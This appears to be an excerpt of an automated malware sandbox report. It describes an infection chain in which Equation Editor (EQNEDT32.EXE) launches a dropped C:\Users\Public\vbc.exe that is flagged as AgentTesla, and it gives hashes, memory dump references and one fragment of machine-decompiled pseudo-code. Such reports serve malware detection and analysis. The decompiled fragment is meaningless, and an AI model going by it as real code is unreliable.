          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          Wow64 process (32bit):true
          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Imagebase:0x400000
          File size:543304 bytes
          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:19:32:04
          Start date:20/11/2020
          Path:C:\Users\Public\vbc.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\Public\vbc.exe'
          Imagebase:0x1340000
          File size:618496 bytes
          MD5 hash:020BC13012CE4DB6E204CB1ED174851E
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmp, Author: Joe Security
          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2362460442.0000000004454000.00000004.00000001.sdmp, Author: Joe Security
          Antivirus matches:
          • Detection: 100%, Joe Sandbox ML
          Reputation:low

          Disassembly

          Code Analysis

            Executed Functions

            Memory Dump Source
            • Source File: 00000004.00000002.2355657537.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.2355657537.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.2355648724.00000000001AD000.00000040.00000001.sdmp, Offset: 001AD000, based on PE: false
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.2355648724.00000000001AD000.00000040.00000001.sdmp, Offset: 001AD000, based on PE: false
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            C-Code - Quality: 79%
            			E013CF3A9(signed int __eax, void* __ebx, signed int __ecx, intOrPtr* __edx, signed int __edi, signed int __esi) {
            				_pop(_t417);
            				_t401 = _t398 | 0x00000064;
            				 *_t401 =  *_t401 + _t401;
            				 *_t401 =  *_t401 + _t401;
            				 *_t401 =  *_t401 + _t401;
            				_t402 = _t399;
            				 *((intOrPtr*)(_t425 + 0x28)) =  *((intOrPtr*)(_t425 + 0x28)) + _t425;
            				 *_t402 = _t402 +  *_t402;
            				_t403 = _t401;
            				_t463 = _t402;
            				_t442[0x1a03314a] = _t442[0x1a03314a] + _t425;
            				 *_t463 =  *_t463 + _t417;
            				 *_t403 =  *_t403 & _t403;
            				 *_t403 =  *_t403 + _t403;
            				 *((intOrPtr*)(_t463 - 0x6cf1dae8)) =  *((intOrPtr*)(_t463 - 0x6cf1dae8)) + _t403;
            				 *_t425 =  *_t425 + _t425;
            				 *_t403 =  *_t403 + _t403;
            				 *_t403 =  *_t403 + _t403;
            				 *_t403 =  *_t403 + 0xffffffc3;
            				asm("adc al, 0x3c");
            				_t404 = _t403 + 0x69;
            				 *_t463 =  *_t463 + _t417;
            				 *_t404 =  *_t404 & _t404;
            				 *_t404 =  *_t404 + _t404;
            				 *((intOrPtr*)(_t463 - 0x6cf1dae8)) =  *((intOrPtr*)(_t463 - 0x6cf1dae8)) + _t404;
            				 *_t438 =  *_t438 + 0x22;
            				return _t404;
            			}
























































































            Memory Dump Source
            • Source File: 00000004.00000002.2356735708.0000000001342000.00000020.00020000.sdmp, Offset: 01340000, based on PE: true
            • Associated: 00000004.00000002.2356705865.0000000001340000.00000002.00020000.sdmp
            • Associated: 00000004.00000002.2357025184.00000000013DA000.00000002.00020000.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8896f4aed2a94234c87bcc9ca158c0776746b17fc77457409e7b737481753ab2
            • Instruction ID: ed8985b6c1538b60834a37d02fd4fb6afa395ca0d33326267243aaa9d975fddc
            • Opcode Fuzzy Hash: 8896f4aed2a94234c87bcc9ca158c0776746b17fc77457409e7b737481753ab2
            • Instruction Fuzzy Hash: 1A42EC6158E3D25FD7138B744CB5686BFB0AE1312475E8ADFC0C1CB8E3E258598AC762
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.2356735708.0000000001342000.00000020.00020000.sdmp, Offset: 01340000, based on PE: true
            • Associated: 00000004.00000002.2356705865.0000000001340000.00000002.00020000.sdmp
            • Associated: 00000004.00000002.2357025184.00000000013DA000.00000002.00020000.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c27d6f436f07d0624a54a1ca5b1f2e92bd49e0c64df507a3881f6f8eecea890d
            • Instruction ID: 907295f63474c8afabd7e58d386255e1a939e0cea23300853454adad87892ad0
            • Opcode Fuzzy Hash: c27d6f436f07d0624a54a1ca5b1f2e92bd49e0c64df507a3881f6f8eecea890d
            • Instruction Fuzzy Hash: 12D1216284E3D18FD7178B748CB52827FB0AE53524B0E45EBC8D18F8E3E258595EC762
            Uniqueness

            Uniqueness Score: -1.00%